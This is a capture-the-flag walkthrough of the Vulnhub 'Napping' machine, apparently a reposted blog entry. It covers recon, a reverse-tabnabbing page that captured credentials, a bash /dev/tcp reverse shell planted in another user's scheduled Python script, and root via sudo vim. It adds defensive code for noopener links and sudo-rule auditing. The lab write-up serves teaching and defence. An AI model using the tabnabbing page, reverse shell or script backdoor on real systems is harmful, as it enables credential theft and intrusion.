
Napping

Posted: 2022-12-25 10:57:08


Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo netdiscover -i eth1

Currently scanning: 192.168.101.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:75:2d:c2      1      60  PCS Systemtechnik GmbH
 192.168.56.130  08:00:27:49:ee:4d      1      60  PCS Systemtechnik GmbH


Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.130.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 21:08 EST
Nmap scan report for 192.168.56.130
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24c4fcdc4bf431a0ad0d2061fdcaab79 (RSA)
|   256 6f31b3e77baa22a2a780ef6dd2876cbe (ECDSA)
|_  256 af0185cfdd43e98d325083b241ec1d3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds

The Nmap scan shows two open ports on the target host: 22 (SSH) and 80 (HTTP). Note also that the PHPSESSID cookie is served without the HttpOnly flag.

Getting a shell

Start an HTTP server on Kali Linux and prepare a malicious page and a benign page. The malicious page relies on reverse tabnabbing: when it is opened from a link that lacks rel="noopener", it still holds a reference to the window that opened it and can navigate that window elsewhere.

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ cat malicious.html
<!DOCTYPE html>
<html>
<body>
    <script>
        // The browser global is "window"; the original "windows" is a typo that
        // raises a ReferenceError, so the redirect would never have fired.
        // window.opener is only available when the opening link omitted rel="noopener".
        if (window.opener) window.opener.parent.location.replace('http://192.168.56.206:8000/good.html');
    </script>
</body>
</html>

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ cat good.html
<html>
        <body>
                Jason, great
        </body>
</html>

Submit the link http://192.168.56.206/malicious.html through the target's web application.

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ python -m http.server  80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.130 - - [24/Dec/2022 21:22:02] "GET /malicious.html HTTP/1.1" 200 -

The listener on Kali Linux then receives the administrator's username and password:

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nc -nlvp 8000
[sudo] password for kali: 
listening on [any] 8000 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.130] 36868
POST /good.html HTTP/1.1
Host: 192.168.56.206:8000
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123

Note that the password above is URL-encoded, so %40 must be replaced with @.
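The credential capture works because the target's link-checking routine opens submitted URLs in a way that leaves window.opener available to the submitted page. As an added example that is not part of the original post, the Python code below shows both halves of the defence: rendering user-submitted links with rel="noopener noreferrer" and an http(s)-only scheme check, and auditing existing HTML for target="_blank" anchors that lack noopener. The sample admin page and the attacker.example hostname are constructed for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Only plain web links may be rendered; javascript:, data: and similar schemes are refused.
ALLOWED_SCHEMES = {"http", "https"}


def is_allowed_url(url):
    """True if the URL has an http(s) scheme and a host part."""
    parts = urlsplit(url.strip())
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)


def render_submitted_link(url, text=None):
    """Render a user-submitted URL as an anchor that opens in a new tab but does not
    hand the new page a window.opener reference (rel=noopener); noreferrer also keeps
    the reviewing page's URL out of the Referer header."""
    url = url.strip()
    if not is_allowed_url(url):
        raise ValueError("refusing to render a non-http(s) link")
    safe_href = html.escape(url, quote=True)
    safe_text = html.escape(text if text is not None else url)
    return (f'<a href="{safe_href}" target="_blank" '
            f'rel="noopener noreferrer">{safe_text}</a>')


class _AnchorAuditor(HTMLParser):
    """Collects hrefs of anchors that open a new window without rel=noopener."""

    def __init__(self):
        super().__init__()
        self.risky = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = {name: (value or "") for name, value in attrs}
        if a.get("target", "").lower() != "_blank":
            return
        rel_tokens = set(a.get("rel", "").lower().split())
        if "noopener" not in rel_tokens:
            self.risky.append(a.get("href", ""))


def find_tabnabbing_risks(page_html):
    """Return the hrefs of every target=_blank anchor in page_html that lacks rel=noopener."""
    auditor = _AnchorAuditor()
    auditor.feed(page_html)
    auditor.close()
    return auditor.risky


# Constructed sample of an admin page listing submitted links (not taken from the box).
SAMPLE_ADMIN_PAGE = """
<h1>Submitted links</h1>
<ul>
  <li><a href="http://attacker.example/malicious.html" target="_blank">check this</a></li>
  <li><a href="https://example.com/" target="_blank" rel="noopener noreferrer">fine</a></li>
  <li><a href="https://example.com/docs">opens in the same tab</a></li>
</ul>
"""

if __name__ == "__main__":
    print("risky:", find_tabnabbing_risks(SAMPLE_ADMIN_PAGE))
    print(render_submitted_link("https://example.com/"))
```

Current desktop browsers already treat target="_blank" as implying noopener, but an automated reviewer built on an older engine or a scripted client may not, so the explicit rel attribute remains the portable fix; the scheme allowlist additionally stops javascript: links from running in the reviewer's context.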

Log in over SSH as daniel:

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ ssh daniel@192.168.56.130
daniel@192.168.56.130's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Dec 25 02:24:47 UTC 2022

  System load:  0.32               Processes:               138
  Usage of /:   41.2% of 18.57GB   Users logged in:         0
  Memory usage: 16%                IPv4 address for enp0s3: 192.168.56.130
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
daniel@napping:~$ sudo -l
[sudo] password for daniel: 
Sorry, user daniel may not run sudo on napping.
daniel@napping:~$ ls -alh
total 24K
drwxr-xr-x 3 daniel daniel 4.0K Oct 12  2021 .
drwxr-xr-x 4 root   root   4.0K Oct 12  2021 ..
lrwxrwxrwx 1 daniel daniel    9 Oct 12  2021 .bash_history -> /dev/null
-rw-r--r-- 1 daniel daniel  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 daniel daniel 3.7K Feb 25  2020 .bashrc
drwx------ 2 daniel daniel 4.0K Oct 12  2021 .cache
-rw-r--r-- 1 daniel daniel  807 Feb 25  2020 .profile
-rw------- 1 daniel daniel    0 Oct 12  2021 .viminfo
daniel@napping:~$ cd /home
daniel@napping:/home$ ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Oct 12  2021 .
drwxr-xr-x 20 root   root   4.0K Oct 11  2021 ..
drwxr-xr-x  3 adrian adrian 4.0K Dec 25 02:06 adrian
drwxr-xr-x  3 daniel daniel 4.0K Oct 12  2021 daniel
daniel@napping:/home$ cd adrian/

Create a reverse-shell script in daniel's home directory and insert a call to it at the top of /home/adrian/query.py. That script is evidently executed on a schedule as adrian, since the shell that connects back to port 9999 below belongs to that user:

daniel@napping:~$ nano shell.sh
daniel@napping:~$ cat shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.56.206/9999 0>&1'
daniel@napping:~$ cat /home/adrian/query.py 
from datetime import datetime
import requests
import os
os.system("/usr/bin/bash /home/daniel/shell.sh")
now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()


Privilege escalation

Once query.py runs, the listener on port 9999 receives a shell as adrian, and sudo -l shows that adrian may run vim as root without a password:

┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nc -nlvp 9999
[sudo] password for kali: 
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.130] 58366
bash: cannot set terminal process group (1637): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$ id
id
uid=1000(adrian) gid=1000(adrian) groups=1000(adrian),1002(administrators)
adrian@napping:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
adrian@napping:~$ sudo /usr/bin/vim -c ':!/bin/sh'
sudo /usr/bin/vim -c ':!/bin/sh'
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo

Vim's :! command runs a shell command; started under sudo, it gives a root shell, from which the flag can be read:

:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------  5 root root 4.0K Oct 30  2021 .
drwxr-xr-x 20 root root 4.0K Oct 11  2021 ..
lrwxrwxrwx  1 root root    9 Oct 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Oct 12  2021 .cache
lrwxrwxrwx  1 root root    9 Oct 12  2021 .mysql_history -> /dev/null
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   75 Oct 19  2021 .selected_editor
drwx------  2 root root 4.0K Oct 11  2021 .ssh
-rw-------  1 root root    0 Oct 30  2021 .viminfo
-rw-r-----  1 root root  224 Oct 19  2021 del_links.py
-rw-r-----  1 root root  224 Oct 21  2021 del_users.py
-rw-r-----  1 root root  935 Oct 30  2021 nap.py
-rw-------  1 root root   41 Oct 12  2021 root.txt
drwxr-xr-x  3 root root 4.0K Oct 11  2021 snap
cat root.txt
Admins just can't stay awake tsk tsk tsk
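The root cause of the final step is a sudo rule that grants an interactive editor, which is equivalent to granting a shell. As an added example that is not from the original post, the Python helper below parses the command rules from sudo -l output and flags any that grant ALL, a wildcard, or a program known to be able to run commands or edit arbitrary files (editors, pagers, interpreters, shells), noting when NOPASSWD makes it worse. The sample output is constructed, modelled on the rule above, with a second harmless rule added for contrast.

```python
import os
import re

# Programs that, when permitted under sudo, let the invoking user run arbitrary
# commands or edit arbitrary files as the target account. This is a hardening
# checklist starting point, not an exhaustive list.
SHELL_CAPABLE = {
    "vim", "vi", "nvim", "nano", "less", "more", "man",
    "python", "python3", "perl", "ruby", "bash", "sh", "awk", "find", "env",
}

# Matches one rule line as printed by `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/vim".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Parse the command rules from `sudo -l` output into dicts of runas/tags/command."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything before this line is Defaults, not rules
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):   # several commands may share one rule line
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd})
    return rules


def audit_rules(rules):
    """Return (runas, command, reason) for every rule that effectively grants a shell."""
    findings = []
    for rule in rules:
        cmd = rule["command"]
        program = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
        if cmd == "ALL" or "*" in cmd:
            why = "unrestricted or wildcard command"
        elif program in SHELL_CAPABLE:
            why = f"{program} can run arbitrary commands or edit any file as {rule['runas']}"
        else:
            continue
        if "NOPASSWD" in rule["tags"]:
            why += " (no password required)"
        findings.append((rule["runas"], cmd, why))
    return findings


# Constructed `sudo -l` output modelled on the box, with one harmless rule added.
SAMPLE_SUDO_L = """\
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for runas, cmd, why in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{runas}] {cmd}: {why}")
```

The remediation is to drop the rule, or to grant sudoedit on the specific file the account needs to maintain rather than the editor itself, and to require a password; sudo's NOEXEC tag limits, but does not fully remove, the risk of editors that can spawn child processes.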

From: https://www.cnblogs.com/jason-huawen/p/17003753.html
